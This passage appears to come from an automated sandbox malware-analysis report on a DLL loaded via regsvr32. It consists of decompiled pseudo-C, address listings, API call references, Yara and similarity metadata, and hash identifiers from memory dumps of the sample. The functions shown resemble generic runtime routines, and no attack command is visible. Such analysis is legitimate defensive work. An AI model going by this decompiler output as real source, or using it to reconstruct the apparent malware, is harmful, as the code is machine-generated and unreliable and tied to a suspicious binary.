                                                                      				goto 0x80012845;
                                                                      				E00000001180012EC0(_t192);
                                                                      				goto 0x80012845;
                                                                      				if (r8b == 0x2a) goto 0x800127fd;
                                                                      				E00000001180012DCC(_t192, _t192, _t192 + 0x30, _t211);
                                                                      				goto 0x80012845;
                                                                      				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
                                                                      				_t133 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
                                                                      				_t134 =  <  ? _t141 : _t133;
                                                                      				 *(_t192 + 0x30) =  <  ? _t141 : _t133;
                                                                      				goto 0x80012843;
                                                                      				 *(_t192 + 0x30) = 0;
                                                                      				goto 0x8001298b;
                                                                      				if (r8b == 0x2a) goto 0x80012827;
                                                                      				goto 0x800127f3;
                                                                      				 *((long long*)(_t192 + 0x18)) =  *((long long*)(_t192 + 0x18)) + 8;
                                                                      				_t135 =  *( *((intOrPtr*)(_t192 + 0x18)) - 8);
                                                                      				 *(_t192 + 0x2c) = _t135;
                                                                      				if (_t135 >= 0) goto 0x80012843;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
                                                                      				 *(_t192 + 0x2c) =  ~_t135;
                                                                      				if (1 == 0) goto 0x80012a2a;
                                                                      				goto 0x8001298b;
                                                                      				if (r8b == 0x20) goto 0x80012898;
                                                                      				if (r8b == 0x23) goto 0x8001288f;
                                                                      				if (r8b == 0x2b) goto 0x80012886;
                                                                      				if (r8b == 0x2d) goto 0x8001287d;
                                                                      				if (r8b != 0x30) goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000008;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000004;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000001;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000020;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) =  *(_t192 + 0x28) | 0x00000002;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x28) = _t212;
                                                                      				 *(_t192 + 0x38) = bpl;
                                                                      				 *(_t192 + 0x30) = _t141;
                                                                      				 *((intOrPtr*)(_t192 + 0x34)) = 0;
                                                                      				 *(_t192 + 0x4c) = bpl;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t192 + 8)) + 0x28)) != bpl) goto 0x800128d5;
                                                                      				_t118 = E00000001180006E80( *((intOrPtr*)(_t192 + 0x18)), _t192,  *((intOrPtr*)(_t192 + 8)), _t192 + 0x2c, _t211);
                                                                      				r8b =  *((intOrPtr*)(_t192 + 0x39));
                                                                      				r9b = r8b;
                                                                      				_t163 = _t118 - _t141;
                                                                      				if (_t163 < 0) goto 0x8001294c;
                                                                      				if (_t163 == 0) goto 0x8001294c;
                                                                      				_t200 =  *((intOrPtr*)(_t192 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t200 + 0x10)) !=  *((intOrPtr*)(_t200 + 8))) goto 0x80012913;
                                                                      				if ( *((intOrPtr*)(_t200 + 0x18)) == bpl) goto 0x8001290e;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				goto 0x80012931;
                                                                      				 *(_t192 + 0x20) = _t141;
                                                                      				goto 0x80012931;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				 *((long long*)(_t200 + 0x10)) =  *((long long*)(_t200 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
                                                                      				_t184 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				r9b =  *_t184;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t184 + 1;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r9b;
                                                                      				if (r9b == 0) goto 0x800129d2;
                                                                      				_t202 =  *((intOrPtr*)(_t192 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t202 + 0x10)) !=  *((intOrPtr*)(_t202 + 8))) goto 0x8001296d;
                                                                      				if ( *((intOrPtr*)(_t202 + 0x18)) == bpl) goto 0x80012968;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x20) = _t141;
                                                                      				goto 0x8001298b;
                                                                      				 *(_t192 + 0x20) =  *(_t192 + 0x20) + 1;
                                                                      				 *((long long*)(_t202 + 0x10)) =  *((long long*)(_t202 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x460)))))) = r9b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t192 + 0x460)))) + 1;
                                                                      				_t189 =  *((intOrPtr*)(_t192 + 0x10));
                                                                      				r8b =  *_t189;
                                                                      				 *((long long*)(_t192 + 0x10)) = _t189 + 1;
                                                                      				r9b = r8b;
                                                                      				 *((intOrPtr*)(_t192 + 0x39)) = r8b;
                                                                      				if (r8b != 0) goto 0x80012758;
                                                                      				 *((intOrPtr*)(_t192 + 0x468)) =  *((intOrPtr*)(_t192 + 0x468)) + 1;
                                                                      				if ( *((intOrPtr*)(_t192 + 0x468)) != 2) goto 0x80012733;
                                                                      				return  *(_t192 + 0x20);
                                                                      			}




























                                                                      0x1800126ac
                                                                      0x1800126ac
                                                                      0x1800126ac
                                                                      0x1800126ac
                                                                      0x1800126b1
                                                                      0x1800126be
                                                                      0x1800126c2
                                                                      0x1800126c7
                                                                      0x1800126d1
                                                                      0x1800126d3
                                                                      0x1800126d7
                                                                      0x1800126de
                                                                      0x1800126e7
                                                                      0x1800126e9
                                                                      0x1800126ed
                                                                      0x1800126f0
                                                                      0x1800126f7
                                                                      0x180012700
                                                                      0x180012707
                                                                      0x18001270c
                                                                      0x180012714
                                                                      0x180012719
                                                                      0x180012726
                                                                      0x180012733
                                                                      0x180012737
                                                                      0x18001273a
                                                                      0x18001273e
                                                                      0x180012744
                                                                      0x180012748
                                                                      0x18001274f
                                                                      0x180012755
                                                                      0x18001275b
                                                                      0x180012767
                                                                      0x180012779
                                                                      0x18001278c
                                                                      0x180012791
                                                                      0x180012796
                                                                      0x18001279e
                                                                      0x1800127a0
                                                                      0x1800127a9
                                                                      0x1800127b2
                                                                      0x1800127bb
                                                                      0x1800127c0
                                                                      0x1800127c5
                                                                      0x1800127ca
                                                                      0x1800127cf
                                                                      0x1800127d8
                                                                      0x1800127dd
                                                                      0x1800127e2
                                                                      0x1800127e7
                                                                      0x1800127ed
                                                                      0x1800127f6
                                                                      0x1800127fb
                                                                      0x1800127fd
                                                                      0x180012806
                                                                      0x18001280b
                                                                      0x18001280e
                                                                      0x180012811
                                                                      0x180012813
                                                                      0x180012816
                                                                      0x18001281f
                                                                      0x180012825
                                                                      0x180012827
                                                                      0x180012830
                                                                      0x180012833
                                                                      0x180012838
                                                                      0x18001283a
                                                                      0x180012840
                                                                      0x180012847
                                                                      0x18001284d
                                                                      0x180012856
                                                                      0x18001285c
                                                                      0x180012862
                                                                      0x180012868
                                                                      0x18001286e
                                                                      0x180012874
                                                                      0x180012878
                                                                      0x18001287d
                                                                      0x180012881
                                                                      0x180012886
                                                                      0x18001288a
                                                                      0x18001288f
                                                                      0x180012893
                                                                      0x180012898
                                                                      0x18001289c
                                                                      0x1800128a1
                                                                      0x1800128a5
                                                                      0x1800128a9
                                                                      0x1800128ac
                                                                      0x1800128af
                                                                      0x1800128b3
                                                                      0x1800128bc
                                                                      0x1800128c4
                                                                      0x1800128c9
                                                                      0x1800128ce
                                                                      0x1800128d2
                                                                      0x1800128d9
                                                                      0x1800128db
                                                                      0x1800128f0
                                                                      0x1800128f2
                                                                      0x180012901
                                                                      0x180012907
                                                                      0x180012909
                                                                      0x18001290c
                                                                      0x18001290e
                                                                      0x180012911
                                                                      0x180012913
                                                                      0x180012916
                                                                      0x180012924
                                                                      0x18001292e
                                                                      0x180012931
                                                                      0x180012935
                                                                      0x18001293b
                                                                      0x18001293f
                                                                      0x180012946
                                                                      0x18001294c
                                                                      0x18001295b
                                                                      0x180012961
                                                                      0x180012963
                                                                      0x180012966
                                                                      0x180012968
                                                                      0x18001296b
                                                                      0x18001296d
                                                                      0x180012970
                                                                      0x18001297e
                                                                      0x180012988
                                                                      0x18001298b
                                                                      0x18001298f
                                                                      0x180012995
                                                                      0x180012999
                                                                      0x18001299c
                                                                      0x1800129a3
                                                                      0x1800129a9
                                                                      0x1800129b6
                                                                      0x1800129d1

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1452528299-3916222277
                                                                      • Opcode ID: 053971ade856a9af8a437a1e31e07363f768083e4e94d9d4763dfb1d771e3902
                                                                      • Instruction ID: 964ffaec80fb0c354bd6fa379c4ff0a5031eef9550695aadca3981a6c45d1472
                                                                      • Opcode Fuzzy Hash: 053971ade856a9af8a437a1e31e07363f768083e4e94d9d4763dfb1d771e3902
                                                                      • Instruction Fuzzy Hash: 39B1A372105F8886E7A68F39D0503AD3BA0F30DF88F288119EB4A47395EF35C669D755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E"*
                                                                      • API String ID: 0-4112062927
                                                                      • Opcode ID: a6485d21421c239b251ba366f0efe66737ce7b0db7644feb049bc248d0533d0c
                                                                      • Instruction ID: f8aba3483da7c00ec6567aab73d4006d933638c3326747324480b7f15a80040f
                                                                      • Opcode Fuzzy Hash: a6485d21421c239b251ba366f0efe66737ce7b0db7644feb049bc248d0533d0c
                                                                      • Instruction Fuzzy Hash: E1A1D0B5515709DFCB98CF28C48998A3BA0FF58318F40812EFC5ADB264D774DA68CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #1
                                                                      • API String ID: 0-2756917675
                                                                      • Opcode ID: 7436a092b22b6534b5cccf0f6ce547ed3b167eeb245ce0e6fe6a20869822de94
                                                                      • Instruction ID: 1865d7f904dfd156075cd271adb8b977df8dd3cbbc039e5d4c933c18672105ae
                                                                      • Opcode Fuzzy Hash: 7436a092b22b6534b5cccf0f6ce547ed3b167eeb245ce0e6fe6a20869822de94
                                                                      • Instruction Fuzzy Hash: B3A169B590020DCFCFA8DF78C45A59E7BF1BB58308F206129EC2696262D7B0DA18CF54
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID: <|x
                                                                      • API String ID: 963392458-258214418
                                                                      • Opcode ID: 833025618083b26d3af3dedb6cb77543672a40d90aea71aaa26d9f62f40fdb30
                                                                      • Instruction ID: ec9b53bb25fdc7875b0d9ab5479f04c2412cb3e60181e5179419895ff0362ee4
                                                                      • Opcode Fuzzy Hash: 833025618083b26d3af3dedb6cb77543672a40d90aea71aaa26d9f62f40fdb30
                                                                      • Instruction Fuzzy Hash: C9810174C0871C8FDB69DFA8D88958EBBF0FB58708F20461DD81AAB222DB709945CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,L
                                                                      • API String ID: 0-2724917897
                                                                      • Opcode ID: 33503cffab5d2ae2ede7e740af001e4255c70d41047e77d71b3e7c4aeac811b6
                                                                      • Instruction ID: c1b263bbfc625f30ee2d495abffe5be0449a2dbe95e78bf5640d393b56091089
                                                                      • Opcode Fuzzy Hash: 33503cffab5d2ae2ede7e740af001e4255c70d41047e77d71b3e7c4aeac811b6
                                                                      • Instruction Fuzzy Hash: B171A175554788CBDBBADF28CD8A6DA3BB1FB48304F90022DD84E8E250DB759686CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Izo
                                                                      • API String ID: 0-3009115187
                                                                      • Opcode ID: 3d8ce15d9157b8c9abda8b40bebdaad1a227068d0d6656b129fe21cc03c2c7cc
                                                                      • Instruction ID: 38bc58da79f68d4468cba41104f88bd6731c237643d387803e4561335306df18
                                                                      • Opcode Fuzzy Hash: 3d8ce15d9157b8c9abda8b40bebdaad1a227068d0d6656b129fe21cc03c2c7cc
                                                                      • Instruction Fuzzy Hash: 1E71C0B450038A8FCB48DF28C8968DE3BA1FB64348F514A19FC6697260D7B4E665CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: VW
                                                                      • API String ID: 0-2500538775
                                                                      • Opcode ID: 9747e3644932653f75f039578ea53ff613067f62e896f29d9acf1a0dcd09aac1
                                                                      • Instruction ID: 65f3616b23208438b3775c62bcd1c5be30703042076af6e26dd48d725abd06f7
                                                                      • Opcode Fuzzy Hash: 9747e3644932653f75f039578ea53ff613067f62e896f29d9acf1a0dcd09aac1
                                                                      • Instruction Fuzzy Hash: C3817BB590034A8FCB89DF64D48B5CE7FB0FB28398F204519F81696250D3B49AA9CFC4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00000001180059A0C(void* __edx, void* __rcx, void* __r8, void* __r10, signed long long* _a40) {
                                                                      				signed int _v72;
                                                                      				char _v200;
                                                                      				signed int _v216;
                                                                      				intOrPtr _v232;
                                                                      				void* __rbx;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t14;
                                                                      				void* _t34;
                                                                      				intOrPtr _t41;
                                                                      				intOrPtr _t45;
                                                                      				signed long long _t60;
                                                                      				signed long long _t61;
                                                                      				signed long long _t62;
                                                                      				void* _t63;
                                                                      				void* _t64;
                                                                      				signed long long _t65;
                                                                      				signed long long _t85;
                                                                      				signed long long* _t86;
                                                                      				void* _t87;
                                                                      				signed long long _t88;
                                                                      				void* _t97;
                                                                      				void* _t98;
                                                                      				void* _t99;
                                                                      
                                                                      				_t96 = __r10;
                                                                      				_t60 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t61 = _t60 ^ _t88;
                                                                      				_v72 = _t61;
                                                                      				_t86 = _a40;
                                                                      				_t45 = r9d;
                                                                      				_t99 = __r8;
                                                                      				_t98 = __rcx;
                                                                      				 *_t86 = _t85;
                                                                      				if (__edx != 1) goto 0x80059b29;
                                                                      				_v232 = 0x80;
                                                                      				r8d = _t45;
                                                                      				_t14 = E00000001180059BD4(_t34, __edx - 1, _t63, __rcx, __r8, _t85, _t86, __r8,  &_v200, __r10, _t97);
                                                                      				_t64 = _t14;
                                                                      				if (_t14 == 0) goto 0x80059ab1;
                                                                      				_t5 = _t85 + 1; // 0x1
                                                                      				E0000000118003C1F4(_t14, _t64, __r8, __r10);
                                                                      				 *_t86 = _t61;
                                                                      				E0000000118003A674(_t61, _t64);
                                                                      				if ( *_t86 == _t85) goto 0x80059b9a;
                                                                      				_t6 = _t64 - 1; // -1
                                                                      				if (E0000000118005515C(_t5, _t61, _t64,  *_t86, _t64, _t86,  &_v200, _t6) != 0) goto 0x80059bbf;
                                                                      				goto 0x80059b9d;
                                                                      				if (GetLastError() != 0x7a) goto 0x80059b9a;
                                                                      				r9d = 0;
                                                                      				_v232 = 0;
                                                                      				r8d = _t45;
                                                                      				if (E00000001180059BD4(0, GetLastError() - 0x7a, _t64, _t98, _t99, _t85, _t86,  &_v200, _t6, __r10, _t97) == 0) goto 0x80059b9a;
                                                                      				E0000000118003C1F4(_t21, _t21, _t99, __r10);
                                                                      				_t65 = _t61;
                                                                      				if (_t61 == 0) goto 0x80059b1a;
                                                                      				_v232 = r15d;
                                                                      				r8d = _t45;
                                                                      				if (E00000001180059BD4(0, _t61, _t65, _t98, _t99, _t85, _t86,  &_v200, _t61, __r10, _t97) == 0) goto 0x80059b1a;
                                                                      				_t62 = _t65;
                                                                      				 *_t86 = _t62;
                                                                      				goto 0x80059b1d;
                                                                      				E0000000118003A674(_t62, _t85);
                                                                      				goto 0x80059b9d;
                                                                      				if (1 != 2) goto 0x80059b6d;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				if (E00000001180036CD0(_t45, _t62, _t85, _t99, _t86, _t87,  &_v200) == 0) goto 0x80059b9a;
                                                                      				E0000000118003C1F4(_t26, _t26, _t99, _t96);
                                                                      				if (_t62 == 0) goto 0x80059b1a;
                                                                      				r9d = r15d;
                                                                      				_t41 = _t45;
                                                                      				E00000001180036CD0(_t41, _t62, _t62, _t99, _t86, _t87, _t62);
                                                                      				goto 0x80059b0b;
                                                                      				if (_t41 != 0) goto 0x80059b9a;
                                                                      				asm("bts ebp, 0x1d");
                                                                      				_v216 = 0xffffffff;
                                                                      				r9d = 2;
                                                                      				if (E00000001180036CD0(_t45, _t62, _t62, _t99, _t86, _t87,  &_v216) == 0) goto 0x80059b9a;
                                                                      				 *_t86 = _v216;
                                                                      				goto 0x80059aaa;
                                                                      				return E00000001180002FB0(_v216 | 0xffffffff, 0, _v72 ^ _t88);
                                                                      			}




























                                                                      0x180059a0c
                                                                      0x180059a1e
                                                                      0x180059a25
                                                                      0x180059a28
                                                                      0x180059a30
                                                                      0x180059a3a
                                                                      0x180059a3d
                                                                      0x180059a40
                                                                      0x180059a43
                                                                      0x180059a49
                                                                      0x180059a54
                                                                      0x180059a5c
                                                                      0x180059a62
                                                                      0x180059a67
                                                                      0x180059a6c
                                                                      0x180059a6e
                                                                      0x180059a74
                                                                      0x180059a7b
                                                                      0x180059a7e
                                                                      0x180059a86
                                                                      0x180059a8f
                                                                      0x180059aa4
                                                                      0x180059aac
                                                                      0x180059aba
                                                                      0x180059ac0
                                                                      0x180059ac3
                                                                      0x180059ac7
                                                                      0x180059ada
                                                                      0x180059ae8
                                                                      0x180059aed
                                                                      0x180059af3
                                                                      0x180059af8
                                                                      0x180059afd
                                                                      0x180059b0d
                                                                      0x180059b0f
                                                                      0x180059b15
                                                                      0x180059b18
                                                                      0x180059b20
                                                                      0x180059b27
                                                                      0x180059b30
                                                                      0x180059b32
                                                                      0x180059b35
                                                                      0x180059b47
                                                                      0x180059b4e
                                                                      0x180059b59
                                                                      0x180059b5b
                                                                      0x180059b61
                                                                      0x180059b66
                                                                      0x180059b6b
                                                                      0x180059b6f
                                                                      0x180059b71
                                                                      0x180059b75
                                                                      0x180059b80
                                                                      0x180059b8d
                                                                      0x180059b93
                                                                      0x180059b95
                                                                      0x180059bbe

                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 0000000180059AB1
                                                                        • Part of subcall function 000000018003C1F4: RtlAllocateHeap.NTDLL(?,?,00000000,000000018003885A,?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000), ref: 000000018003C249
                                                                        • Part of subcall function 000000018003A674: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,000000018004F9D6,?,?,?,000000018004F4BB,?,?,00000000,00000001800473F4,?,?,?,00000001800472FF), ref: 000000018003A68A
                                                                        • Part of subcall function 000000018003A674: GetLastError.KERNEL32(?,?,?,000000018004F9D6,?,?,?,000000018004F4BB,?,?,00000000,00000001800473F4,?,?,?,00000001800472FF), ref: 000000018003A694
                                                                        • Part of subcall function 000000018005515C: _invalid_parameter_noinfo.LIBCMT ref: 000000018005518F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$AllocateBoundaryDeleteDescriptorHeap_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4255177923-0
                                                                      • Opcode ID: b052fb44c7f85dbd17905962c2847953af4cc1046f2b2b7c7d02931ab6fd8d48
                                                                      • Instruction ID: e9dc45761b454eaaf0005313a63fd173d5244a8aa9b26cb6785b79c02b0d7e9d
                                                                      • Opcode Fuzzy Hash: b052fb44c7f85dbd17905962c2847953af4cc1046f2b2b7c7d02931ab6fd8d48
                                                                      • Instruction Fuzzy Hash: CB41F53131634902FAA39EA679517EAA391BB9EBC0F04C525BE49577C6DF3EC6098700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ]En
                                                                      • API String ID: 0-3156317166
                                                                      • Opcode ID: c3012f277d2149ecd470deb9cf87deeea52a9833caf8842dc55c2750ccd13584
                                                                      • Instruction ID: 85dc2b06b56e414b55c39eaca619e0e7d1877d58bce0f77c199b7e0d84bb9a3f
                                                                      • Opcode Fuzzy Hash: c3012f277d2149ecd470deb9cf87deeea52a9833caf8842dc55c2750ccd13584
                                                                      • Instruction Fuzzy Hash: 83516D74A0460C9FCF58DFA8E4865DEB7B2FB58348F00412AE80AE7350DBB4D959CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: _ Td
                                                                      • API String ID: 0-510638873
                                                                      • Opcode ID: 4bfda80203d76a45024092b7c426b38154e04a5f30b78fb6bdc09f605e3bb6bd
                                                                      • Instruction ID: 4fa3cc17f12b409437eb1c7862c8d9c84ce70d76ebcbbf713ae92ea41cd55cad
                                                                      • Opcode Fuzzy Hash: 4bfda80203d76a45024092b7c426b38154e04a5f30b78fb6bdc09f605e3bb6bd
                                                                      • Instruction Fuzzy Hash: E351087091474A9BCF88DF68C8969AEBBB1FB58340B44421DFC5A9B350D738E991CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: '@,
                                                                      • API String ID: 0-14854801
                                                                      • Opcode ID: fe9899e325c7dcb24d321641bfc64d738342c1dc98d9e84c1c5634ccdcfbe8ec
                                                                      • Instruction ID: 738020e4896b385c84f3fef79b8fb5e58aeb19f4d669d9ba2228ee9a534ff550
                                                                      • Opcode Fuzzy Hash: fe9899e325c7dcb24d321641bfc64d738342c1dc98d9e84c1c5634ccdcfbe8ec
                                                                      • Instruction Fuzzy Hash: 54412474530789ABCB88DF28D8CA99D7BE1FB45708B80662DFC4ACA261D770D485CF46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: g0
                                                                      • API String ID: 0-1304223539
                                                                      • Opcode ID: ed33ba13946c48e86bd433cea21fa7b64279f01bcbb1fd3589137861b674b1c7
                                                                      • Instruction ID: 3660933f860f512be45a336ce14a19d4d826c088d6cd0a9b705df632cd6a3744
                                                                      • Opcode Fuzzy Hash: ed33ba13946c48e86bd433cea21fa7b64279f01bcbb1fd3589137861b674b1c7
                                                                      • Instruction Fuzzy Hash: EF41C2B49087C48BC758DFA9D59A51AFBE2FB84348F504A2DF4868A760D7B4D448CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .Yc
                                                                      • API String ID: 0-1917871111
                                                                      • Opcode ID: 352bcc298aa4bf4e90ea99c47cd8defea0eae8dfbad0962714257dc8950e666d
                                                                      • Instruction ID: 339c7f32a5086a28d9d20a9996b263c4b91c9e79b539c7e36446722616b84021
                                                                      • Opcode Fuzzy Hash: 352bcc298aa4bf4e90ea99c47cd8defea0eae8dfbad0962714257dc8950e666d
                                                                      • Instruction Fuzzy Hash: B241D1B190074E8BCF48CF68D8864DE7FB0FB68798F104219E84AA6250D3B496A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: G8
                                                                      • API String ID: 0-2111707058
                                                                      • Opcode ID: e480c7c465a98fbcdd0afdc1d78eafdf86582f2b7c0784f06b7ced6dd1bc7d72
